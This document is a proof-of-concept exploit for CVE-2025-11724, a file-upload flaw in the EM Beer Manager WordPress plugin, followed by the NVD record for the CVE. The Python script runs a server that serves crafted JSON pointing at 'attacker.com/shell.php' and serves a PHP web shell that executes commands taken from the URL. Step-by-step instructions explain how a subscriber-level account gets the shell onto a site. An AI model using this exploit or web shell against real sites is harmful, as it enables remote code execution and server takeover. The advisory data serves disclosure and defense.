CVE-2025-11724

import json import http.server import socketserver import base64 # PoC for CVE-2025-11724 - EM Beer Manager Arbitrary File Upload # This is a mock HTTP server that serves malicious JSON data class MaliciousHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): if '/untappd-feed' in self.path: # Return malicious JSON with PHP shell URL response = { 'response': { 'checkins': { 'items': [{ 'media': { 'photo': { 'img_id': 12345, 'photo_img_md': 'http://attacker.com/shell.php', # Malicious PHP file URL 'caption': 'test' } } }] } } } self.send_response(200) self.send_header('Content-Type', 'application/json') self.end_headers() self.wfile.write(json.dumps(response).encode()) elif '/shell.php' in self.path: # Serve malicious PHP shell php_shell = b'<?php system($_GET["cmd"]); ?>' self.send_response(200) self.send_header('Content-Type', 'text/plain') self.send_header('Content-Length', len(php_shell)) self.end_headers() self.wfile.write(php_shell) else: self.send_response(404) self.end_headers() PORT = 8080 with socketserver.TCPServer(('', PORT), MaliciousHandler) as httpd: print(f'Malicious server running on port {PORT}') httpd.serve_forever() # WordPress Exploitation: # 1. Attacker needs subscriber-level account # 2. Setup malicious HTTP server above # 3. Send AJAX request to wp-admin/admin-ajax.php with action=embm-untappd-import # 4. The plugin will download and save shell.php to uploads directory # 5. Access shell.php via web to execute commands

{"cve": {"id": "CVE-2025-11724", "sourceIdentifier": "[email protected]", "published": "2025-11-04T05:15:56.887", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The EM Beer Manager plugin for WordPress is vulnerable to arbitrary file upload leading to remote code execution in all versions up to, and including, 3.2.3. This is due to missing file type validation in the EMBM_Admin_Untappd_Import_image() function and missing authorization checks on the wp_ajax_embm-untappd-import action. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files including PHP files and execute code on the server granted they can provide a mock HTTP server that responds with specific JSON data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/embm-admin-actions.php#L393", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L867", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L899", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/em-beer-manager/tags/3.2.3/includes/admin/integrations/embm-integrations-untappd.php#L912", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/76b7a946-71ad-46da-95f6-a02703812938?source=cve", "source": "[email protected]"}]}}